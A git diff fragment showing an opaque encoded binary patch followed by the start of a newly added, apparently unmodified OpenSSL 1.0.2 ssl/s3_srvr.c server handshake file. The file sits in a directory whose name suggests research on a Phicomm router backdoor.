z03Q1=vmn{Oxw*U_s$lSUAcuR(+C!|#({l2=cp5#g;aAeWtQa57(1WUl3A3;%KLNx0
zW?=06>5sEn^Jubv>s7|!>aEuZo3jzaBjey9EG<`5V||Z#C6yqBG)bhh8$!`8KU?wW
zORDQ+P4{AVroy=2UnDu?YN~$#v9HSlK-n@}a;p5aadv`Y+5(6*xZ@@(h&=FbYam|U
ze@xl2)YZ8~ojMh64odng<B&$7reAIzIef`uTypCZf9Cpv3x4m&Gmj`czLE#$k#(W&
zrQ=wVpa@;4T0tR0y0mMFM4CH6k|kp>PoK$|7^;~4#-OXC5MIelHU`J*14@qv)E1&8
z6zx~t$UIm)%5ccO+Zti0V(z>H57jF0hs>REboDD$GesP#wb1|WV<C&tft&{6odQW)
zLPiD5;}n6jur!K$KMCo@A9fGY7SA);6&^&|jyTo~kyfC%wh>tX{aG|gE|XglMEpz$
z+9V{uk4ZD%aby+JmYxeyip9j(E_U-bcsn0!y@xD-plieCU&{wVW_qR4GY(iUt@$$~
zG5hph`aQY!F3!nU%;+D-mR>QLbbXEMlywI=0YQjWrd`Kl$=pM!O0{PB1LnSc)HU}|
z!Xk2W4{dn!WjhDH4c`o>!SqCg4sEGp#ls-Wi1w}znIB=-o4;ITzKavQC~Q5GfTgLW
zEP1Fn&^?Or3}r;=z9O~z3OuF0zo!uI{sQ$`1mN^bpdU8h30OZR+EjvZIO7Ay%Czeh
zW6O<_?gNpMU0sF)g%)WJi1h+{KfMm}jI30=y>*Ta$QbPVN1$wj4V^RTKLdhM<Qzo)
zd)i{IKNS6~c?R-TH>|dHkiU3<LRZJ-oGM^46Vs0qx9dH{d^=cjPN{fH+Ze2Pnl^sG
zycml9#yq3Q)!p>&NQ6=6U%Zsf+Ooct0Dr*z0ZkN>$*fZ<jt9H_`I>Beh%}-MBx%H@
z-5jzQY3c!H3z$Ht&*S5T+O?q(Tg{_i27Qb)<55bEr#E2ZWATbUdA2FFt5oyDTdk$4
zYCS^M%$0oDD}%1!%-0m-wF`=I>>AbRJ&(OEX`fQ9Dr}x}s)_W;j^peKAF8a{OpR)7
zrvyv^Jl@z`h^=V5KMB4*KSqZ0TgIna5A9<qefM)1rc6I14qHY4HcsNqJ*11n1683y
zZK7($S6D07WG0|fX{~_4R)W}JOy}Wgke6Li%p$_k%?h6!-P2UdAg+M9_hGOozkq3Y
zIeYs$9AT^+Wre6}eq{cRwlWTRKGC~7w@4CL%%l1^W3XBqpFDlvgv`317ejzz{4Gx}
zQmv<L9}H+HR}S3`(QFO)<}-R&umyJPJ%y1}f=)fszGKhJc<56}-8yVL9Hy#OxjB1w
z9V!AkSw~jMFW9GR=UXJ()Tk<}^<!lN{zdhu3+IwODz^P8Jh5f1?Fj;m9;#olgxKl@
zlnQ6a-|FvP^`>#jwP`92lqs3%%vQMn_ZdG37D?K5UHuy0Ma-2CL%{GdD#ov}>0je$
zC27<3uc~&48ol46NojRz=aD_=kqL(qKmz7}mmIbZ&}j0+)@zdk+GoE$NrgE@YWB#E
z0=H^)6PcRr&zeM(NtK_d_|>MVfv@LJ3hd~TNtl{FoXIHW@$_2Ki&UUpq2hcm1Rruq
zz`uqLA7AEk@FJTH<%~0UVY%Ws<q97d_2-9kMfy5yjfzFG@i*k!ux%+XdXOC`cqDB~
z=a%qAbmXL#PiNeAAK<X{V`dQ)7Gr_g!lPfN7_a-ZtHJvg8Kuj%D)L`?KG>8)QYFbq
zRw{^rfPe8d7$K`Gxe|Snu_c}_Z(jsr9ysME`sg6QJXC8poq%j^a04AH%O^8Bc6wNM
zHl~8iRN9Bvu#*D^iG7Zg52)tL<yqx6=NMUYySyJ45;mKFyuaNg@2|>J4xjTV6OT7o
zRk#!xhv;yS<O3%a^AYleeupAIbLQqdC2dvjWW2M<_3Z-9a9k|7Q|he-l6WI4CvTku
z>v$n1C#&o?7Kw85Gk6Qi2L=MBE~Sg{(x4pv*wdgGAG@__w%bSt6QAz-2pP<dF!=yN
z>LK!jYP>m4tvI=fJNY;umXWPsT(J(2!N&P<702(TN`yQ^iWQ5^M8%;QGHoy4T<fot
zw{6Fut@R(!%d9^LcFFvU6H3h89sARNm`Hl>_m?3Y9w8Q7Rd-wj?U3L@X8~i0yJ@9W
z^Q7GMK8DqbU(1GsGtbuX4UptGu6H`H^wp3L!&p2aA<(J~*AdJJJ<;0<%F%q^OGj(^
zRS%hX=p_1*+_jE!zjcVx0gD@ihTK)13pxewQRBnPO+#n&3uL%(Ml04Xiv7cBkK*1%
z{;ha^6JM&mkZ&(l3z8%hl6utoDpQK0Ol5_iN|oP)?kZQs;kM)dJJk*0?k>L_*P6fB
zd?jqA=)!3WR7xHt{dBWbGetpbJH06-r-CNy)wqW}_#)$CZq)p~p?vN^VLyrS*C6SQ
zr*xLV>2N<tNY`;@H%89!g$;Fg&1NfFaYWuW9>rYmOsE`n73iLwzHI_q^mZPc4-qzr
zYQWTXRu<ts6^!E-7e4)}Y}mh8P7b2Xvg6|h$hO`2)Od1dG66!P=Q+TVHWTTE)?vEF
zg+B;1y$yr`OAjc<xjbzK)R0T4@qCtkf(|_E5#mJ17s$!yG3dlMrAi+=7*Lq=;Bm57
zJ?PTcLwwLY7fik;?|g;&6_1mGpj^#%8a5nFE95>vq00^sawZO@i|;-rC-;Fvu~#YR
zVw8cB3rIdB0s)!afpKSt4m-%Me+uQUCJYZbAs;;0eX9xMi9W63#ke$GpAqg(P+oop
znOaiE(Ls_vgY0Qsx`K`ErZMb7j6F<aN7z`AHrd#M6EBpm0_X_EbEFsHKYI`L$s~dA
z8Hc<NJD0%p&!C&1X2wCXz%6gP2am)-vJ95rMN0UYLA!Aoy<>4Phz(nbw^S$bQTw2i
zF=exoJ~46dyM$`j+A-3Ee&5JLxpzLW^l4_m(2e4Hb_S3`Sc)mnqFy4Q%1TQgx>P9Z
zsP<q%Zw$KS<b^>>8_5K?1|*l9Jd1au=T*`#CtspLPVGEt71zQ;>HWeWMCt8A3->*;
zL67o6YU}Mr5A)8ZTN6EGk4r~QXP=}vz7{(k(dGla8{-3sPvJLTpVM0pInE_ZSR!V9
z`m@aP?gVIzgS5yld0Ph_kV4s{!TL4@L8_C6sNwAUAt87ke30m%+;$no2}`M8fyao%
zK04vG@@)2`vPM}8nJa7--N&s&g7I)@3LO-M*sm(mRN=M{+10o&zY;pkcjN;vL5A^>
zOAmuHL57$;lyHN|tX^Q$1oDFA1L-*JStDC7CnFyq<*cG{`l^?^?#19w{|N>|VxF8d
z@XDp~-Osp`?nkJSA7+NilMos1evD;W=D>jY*Rc6UUm=OG?`pWS;01S>KeDZZlCJwR
z1Td5=bt+$>=uPj3F?O5|fHbpaAQ*6IGo0FLI6I}g$!d$0A;#b|Ihg`Euf1IQ4D?vK
z)Th)~kCwq!C2=!8CD@WTfOL2=%$(kvfTgLTR*i#n%NVM`k~C091D0!FLVMHSp_(o@
ziGo51B3k}y!sg5N4IJddtKLhAotA#>UEH}?$5eunGSM;pv<;qmKbuXz`W`lnv;BXF
zVX9Z<Bz^O<g6iBXQV8vik^z@X_apnbQo+R}C6%O)E!3OYKUcbt&5o0NI7x#lbPd<B
zYd|1(ErcRFN9N1PTkyioGJ1H9ya5<oPHu4aDbHQcI_Zn2Eqm*yuOq7mr*}-iQf!@&
z`LZ!MLz|6{K=bHp53Ysx&J<jgexA+oJQ=IsXfMh8=;tm8YC9<tvd06|KVuv`OHA7H
zaE07^wxE4-_wEaCL-nP?O;gc5!@BoAfw3v=|C;I~74QlUxp%YKKI%EsNozpNOP?-O
zDp+BM3paaa|HHVHmAkHih5TsZ@zcG`rI@=YrYukQT9;X*e0|{pWyeB~l4T`L=2_LU
zZ%_5=f_!$J(#El+RXdN-GhklG{RmQvxg8{{`ltY-3z~8(zfY$gpnD!QT!>Dgd;X<2
z>H3eGDqpM)dH61v{w4?$Jw%tMUq;`2%TJWQ*oPY5jxHXq6r*L>bP3?>(-4A{B`T$d
z`KEg(Nw`f&?-6AUc%58zIr@}QhjW!Sn^)I;o=WE22J0b`vF$JNffutU>4r>K(e`<_
zv@e)<%e^gnvv2Vie4%Bvks4)<)V?4Rzeg*LO3iiANPE-QVl)`MZ3PWRY66i}q1%Jf
z+<Ix%s<5waW2{Z{LBRT0n@^IKR#ko8SG;<?-lFNgiqZw8W%J5Er?c1ct@F!D%NCZ{
zFs3Te`9XP!u0u<gt)`IZCye5o8tqSNuCJ|>T$>ABR~Ah0?524Fo5e;X=?CPYYH#7L
zyd~bEo$e)GUw8fzZ}B(A1-xb3#w*@M#)N?PZg)qXcM%Z9TMP<NF7XyF@p`~Y`Wv|{
z3T$eG-OqZG<Y2{k-_5b<uz_@bBTw-bZF4JLpONpL<nk6Nw$zOn{spJ~3rz;vMEind
zpF;Kp9Q$r@dmC@_#;d%IiudlkyC-=UE&YVG!O7L$MPU2HB*-5(l1*s++_us6Rgu1G
z?+W*~U1Ruz=DC^6nkvrIa0k3Tci!+UC21jOALF!id9r;HAfJ4Re3I8X$y*d)KB=Az
zSJ_?LkF4|n%lD_)e4@R>>&N`F)Vnv&y)e(aFR$AB)4VD?6+&F&(F*|yILMVQ^lE^F
z@LWPPe;_0bq{gB7aEysBf*Em&CA7Echpq22noH2@%QL*iA#Yg~3!l8op_L}Wu^YK2
zU%HqbjlwN)$K?#VhoXPvfSc`>kr>5h9^|~hHw=q4PU2>}Y9u|qxg}g=Mrm%zGYU%d
zR0of2MeLP!?Z`Hpy^fRU-$%qYhrO_aPlToGIlg!Vidg3O7jtlWbxXJ!<g{|UUncmI
z<pf~#HJbKvZd(OlH2m+zz}v>a6Jy|Xe;Z9c{d?1B_>;iNe#dSn=N#ww6Fe>*{C6Cu
znv5FDM|i%8ztQBsHwIpS5FCx3>hjU>>&C!u9s{ohPV?&HA=i(0YOyis<741o8w013
zpX6`lA<FU<<o|@@yST$xZURnc>uB@(EvLVZ4rVl#lkhw@2L0d|_;{?xX!2)|f!{C&
z{`oQRFOPw*9|NcVaxt1c4~&8D9s~a;;N<6{_QtpKBmDF981%yhM15<dy?x_?$h~b%
zT1+YpSC!FEIsMG1p9S=@P+~M~vAX(5ixgQJUcN*LN0wJtuL{;iYLzA7V8o_qk7;^5
z!syoP4Gpn2sX5l%+`1_y1y`<&#C0taYinz5lOptNX^m`bjn-*Rtu4}$&~nD+DB2jS
zYmbc(#4LcddP}smIo=j)Z?|ayjRe?CBJo&DeN)Q@CfJ@E6JQ%?lW+@J*%XLW)vk#&
z*Gv43YAV*R3awCsE7@qn#<~sdxnR?#$i`U92CdPyhD*Lri?vJ3VFL=VKvRtBut>XB
z2M=>c+VdM>hcm%wV_nOJSR~pMZ;Z7?+T*dP&D4$=MOZP%#F4#iG4gGs9nK&pa@km<
z^~?bF9$g=WgW~r^P%27QE7z{5T^_-rM4RK1wz0iD5^rmbf<Mw2t83HN$LcgDeM3x(
zw5@MyW&Vr8+O~*2eXgS=wxLyP5+*bRM52wc=sk?Dy(Qk()S@-8#jmTcw--NBU#HdC
z<4|HtjgWVu_kj1FNJCxIMtdstP3`eIE!xOuO)(PH+NgHB9e>oQ7QGCAf5YchYEB*@
z{Bi+bh<rdT7uN)wYFS6lUIC{YhJ*h}!0GF;gL|>hsF8e8PNjg;nd{JJ1YDFqk=F^i
za@Gj=m4cjh0T=b&L;}$0L3OyJ*AQ^31swe0F>v+)iOac4pr6W13t|)XUJ&rB1^V&4
zBp`a9fPcWx9dZX91&%##Ug{7|Dc`|8949$*1iV<luNCl30xsJ5xPX63pudZsQzYLn
z;1>m4l+(=5FQOOmKMFY2P>%gO`T0fkV%+u!xG3k20uZ7Ry*RH$RFk6-PUnXs|D=G6
zavt{*^(W~k(sxyki}c|!@VJ1B@sk__?-p<|e!k0bT3?!?WB=m<F0T6%f*f((Ul(vO
z-X`-ymHZ>(pB3;DLGSkk{00GkQNTt2Y@Z4uwA^(G(xP%)-0$BJ@K0mhneS5qPBpcI
z9~SU=0)9fkMfw^_c4%aeXy-!$F2+y4fR}>D(fgc$-z4C_7jRL|3Q~qfdauKuBPU2n
z4K3H62gktwnd1}>6vB?29|`nj0{(M>o<iH9?-%Il&f(y{6L4`qE~g}pmTTvK3iw=%
zJ96T*sAxnl`adDy;(B!p_<Zm<a{egb;(C3N*KfK0{E>h!5ai68i5E1Y{|x>d`9Aci
zkw59rX&ZUR!JYd|A_sTwGY{wB&V8mo2Y2qb^u3sxBj34K+@FIx_kn#mxN{#kn}a)b
zKl^WSf_$gml}g+1Yu4)4<EgdT&qk-$7TZ`?s>L>IQYouEO4p-wENyG07a}h&MYW3(
zvN_fQl9pC2R*Fwu^H@Q`-#4`ArKpqQ_>guVSV>^4G1Aah*BoQh{eS=XAc3ZwdvmS?
zM(yAEI@@nHt<$F`)dUm+mG~2zhk_T)$In^HsicP=e-aNXws#44<4<fCbM!i6e0iK#
zwiig||COKiD#@fhA~r|=ts;oNqu+T}a*T3>*p|@Yjz&3GY!09E3}Mjei*(JLU&N@N
zOS={rxmet5L>K4$K6(+F<9`SGDmo-Hmwz|s-<LCx%TN1ywDm8hB!zatez01KN*RaW
zS^v>=6U!p|gOOCo>$(D9bR_2Tlg!+;2PCO;=og>qbL`Lc-&D|y#$QCq6z%Wr$Ix#s
G|Nj6a)5?(m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_srvr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_srvr.c
new file mode 100644
index 0000000..2c6fb28
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_srvr.c
@@ -0,0 +1,3493 @@
+/* ssl/s3_srvr.c -*- mode:C; c-file-style: "eay" -*- */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * ECC cipher suite support in OpenSSL originally written by
+ * Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#define REUSE_CIPHER_BUG
+#define NETSCAPE_HANG_BUG
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include "kssl_lcl.h"
+#include "../crypto/constant_time_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/hmac.h>
+#include <openssl/x509.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_KRB5
+# include <openssl/krb5_asn.h>
+#endif
+#include <openssl/md5.h>
+
+#ifndef OPENSSL_NO_SSL3_METHOD
+static const SSL_METHOD *ssl3_get_server_method(int ver);
+
+static const SSL_METHOD *ssl3_get_server_method(int ver)
+{
+    if (ver == SSL3_VERSION)
+        return (SSLv3_server_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl3_meth_func(SSLv3_server_method,
+                         ssl3_accept,
+                         ssl_undefined_function, ssl3_get_server_method)
+#endif
+#ifndef OPENSSL_NO_SRP
+static int ssl_check_srp_ext_ClientHello(SSL *s, int *al)
+{
+    int ret = SSL_ERROR_NONE;
+
+    *al = SSL_AD_UNRECOGNIZED_NAME;
+
+    if ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) &&
+        (s->srp_ctx.TLS_ext_srp_username_callback != NULL)) {
+        if (s->srp_ctx.login == NULL) {
+            /*
+             * RFC 5054 says SHOULD reject, we do so if There is no srp
+             * login name
+             */
+            ret = SSL3_AL_FATAL;
+            *al = SSL_AD_UNKNOWN_PSK_IDENTITY;
+        } else {
+            ret = SSL_srp_server_param_with_username(s, al);
+        }
+    }
+    return ret;
+}
+#endif
+
+int ssl3_accept(SSL *s)
+{
+    BUF_MEM *buf;
+    unsigned long alg_k, Time = (unsigned long)time(NULL);
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int ret = -1;
+    int new_state, state, skip = 0;
+
+    RAND_add(&Time, sizeof(Time), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    /* init things to blank */
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+    if (s->cert == NULL) {
+        SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_NO_CERTIFICATE_SET);
+        return (-1);
+    }
+#ifndef OPENSSL_NO_HEARTBEATS
+    /*
+     * If we're awaiting a HeartbeatResponse, pretend we already got and
+     * don't await it anymore, because Heartbeats don't make sense during
+     * handshakes anyway.
+     */
+    if (s->tlsext_hb_pending) {
+        s->tlsext_hb_pending = 0;
+        s->tlsext_hb_seq++;
+    }
+#endif
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_RENEGOTIATE:
+            s->renegotiate = 1;
+            /* s->state=SSL_ST_ACCEPT; */
+
+        case SSL_ST_BEFORE:
+        case SSL_ST_ACCEPT:
+        case SSL_ST_BEFORE | SSL_ST_ACCEPT:
+        case SSL_ST_OK | SSL_ST_ACCEPT:
+
+            s->server = 1;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            if ((s->version >> 8) != 3) {
+                SSLerr(SSL_F_SSL3_ACCEPT, ERR_R_INTERNAL_ERROR);
+                return -1;
+            }
+            s->type = SSL_ST_ACCEPT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
+                    BUF_MEM_free(buf);
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+            }
+
+            if (!ssl3_setup_buffers(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            s->init_num = 0;
+            s->s3->flags &= ~TLS1_FLAGS_SKIP_CERT_VERIFY;
+            s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
+            /*
+             * Should have been reset by ssl3_get_finished, too.
+             */
+            s->s3->change_cipher_spec = 0;
+
+            if (s->state != SSL_ST_RENEGOTIATE) {
+                /*
+                 * Ok, we now need to push on a buffering BIO so that the
+                 * output is sent in a way that TCP likes :-)
+                 */
+                if (!ssl_init_wbio_buffer(s, 1)) {
+                    ret = -1;
+                    goto end;
+                }
+
+                ssl3_init_finished_mac(s);
+                s->state = SSL3_ST_SR_CLNT_HELLO_A;
+                s->ctx->stats.sess_accept++;
+            } else if (!s->s3->send_connection_binding &&
+                       !(s->options &
+                         SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION)) {
+                /*
+                 * Server attempting to renegotiate with client that doesn't
+                 * support secure renegotiation.
+                 */
+                SSLerr(SSL_F_SSL3_ACCEPT,
+                       SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
+                ret = -1;
+                goto end;
+            } else {
+                /*
+                 * s->state == SSL_ST_RENEGOTIATE, we will just send a
+                 * HelloRequest
+                 */
+                s->ctx->stats.sess_accept_renegotiate++;
+                s->state = SSL3_ST_SW_HELLO_REQ_A;
+            }
+            break;
+
+        case SSL3_ST_SW_HELLO_REQ_A:
+        case SSL3_ST_SW_HELLO_REQ_B:
+
+            s->shutdown = 0;
+            ret = ssl3_send_hello_request(s);
+            if (ret <= 0)
+                goto end;
+            s->s3->tmp.next_state = SSL3_ST_SW_HELLO_REQ_C;
+            s->state = SSL3_ST_SW_FLUSH;
+            s->init_num = 0;
+
+            ssl3_init_finished_mac(s);
+            break;
+
+        case SSL3_ST_SW_HELLO_REQ_C:
+            s->state = SSL_ST_OK;
+            break;
+
+        case SSL3_ST_SR_CLNT_HELLO_A:
+        case SSL3_ST_SR_CLNT_HELLO_B:
+        case SSL3_ST_SR_CLNT_HELLO_C:
+
+            s->shutdown = 0;
+            ret = ssl3_get_client_hello(s);
+            if (ret <= 0)
+                goto end;
+#ifndef OPENSSL_NO_SRP
+            s->state = SSL3_ST_SR_CLNT_HELLO_D;
+        case SSL3_ST_SR_CLNT_HELLO_D:
+            {
+                int al;
+                if ((ret = ssl_check_srp_ext_ClientHello(s, &al)) < 0) {
+                    /*
+                     * callback indicates firther work to be done
+                     */
+                    s->rwstate = SSL_X509_LOOKUP;
+                    goto end;
+                }
+                if (ret != SSL_ERROR_NONE) {
+                    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+                    /*
+                     * This is not really an error but the only means to for
+                     * a client to detect whether srp is supported.
+                     */
+                    if (al != TLS1_AD_UNKNOWN_PSK_IDENTITY)
+                        SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_CLIENTHELLO_TLSEXT);
+                    ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+                    ret = -1;
+                    goto end;
+                }
+            }
+#endif
+
+            s->renegotiate = 2;
+            s->state = SSL3_ST_SW_SRVR_HELLO_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_SRVR_HELLO_A:
+        case SSL3_ST_SW_SRVR_HELLO_B:
+            ret = ssl3_send_server_hello(s);
+            if (ret <= 0)
+                goto end;
+#ifndef OPENSSL_NO_TLSEXT
+            if (s->hit) {
+                if (s->tlsext_ticket_expected)
+                    s->state = SSL3_ST_SW_SESSION_TICKET_A;
+                else
+                    s->state = SSL3_ST_SW_CHANGE_A;
+            }
+#else
+            if (s->hit)
+                s->state = SSL3_ST_SW_CHANGE_A;
+#endif
+            else
+                s->state = SSL3_ST_SW_CERT_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_CERT_A:
+        case SSL3_ST_SW_CERT_B:
+            /* Check if it is anon DH or anon ECDH, */
+            /* normal PSK or KRB5 or SRP */
+            if (!
+                (s->s3->tmp.
+                 new_cipher->algorithm_auth & (SSL_aNULL | SSL_aKRB5 |
+                                               SSL_aSRP))
+&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+                ret = ssl3_send_server_certificate(s);
+                if (ret <= 0)
+                    goto end;
+#ifndef OPENSSL_NO_TLSEXT
+                if (s->tlsext_status_expected)
+                    s->state = SSL3_ST_SW_CERT_STATUS_A;
+                else
+                    s->state = SSL3_ST_SW_KEY_EXCH_A;
+            } else {
+                skip = 1;
+                s->state = SSL3_ST_SW_KEY_EXCH_A;
+            }
+#else
+            } else
+                skip = 1;
+
+            s->state = SSL3_ST_SW_KEY_EXCH_A;
+#endif
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_KEY_EXCH_A:
+        case SSL3_ST_SW_KEY_EXCH_B:
+            alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+
+            /*
+             * clear this, it may get reset by
+             * send_server_key_exchange
+             */
+            s->s3->tmp.use_rsa_tmp = 0;
+
+            /*
+             * only send if a DH key exchange, fortezza or RSA but we have a
+             * sign only certificate PSK: may send PSK identity hints For
+             * ECC ciphersuites, we send a serverKeyExchange message only if
+             * the cipher suite is either ECDH-anon or ECDHE. In other cases,
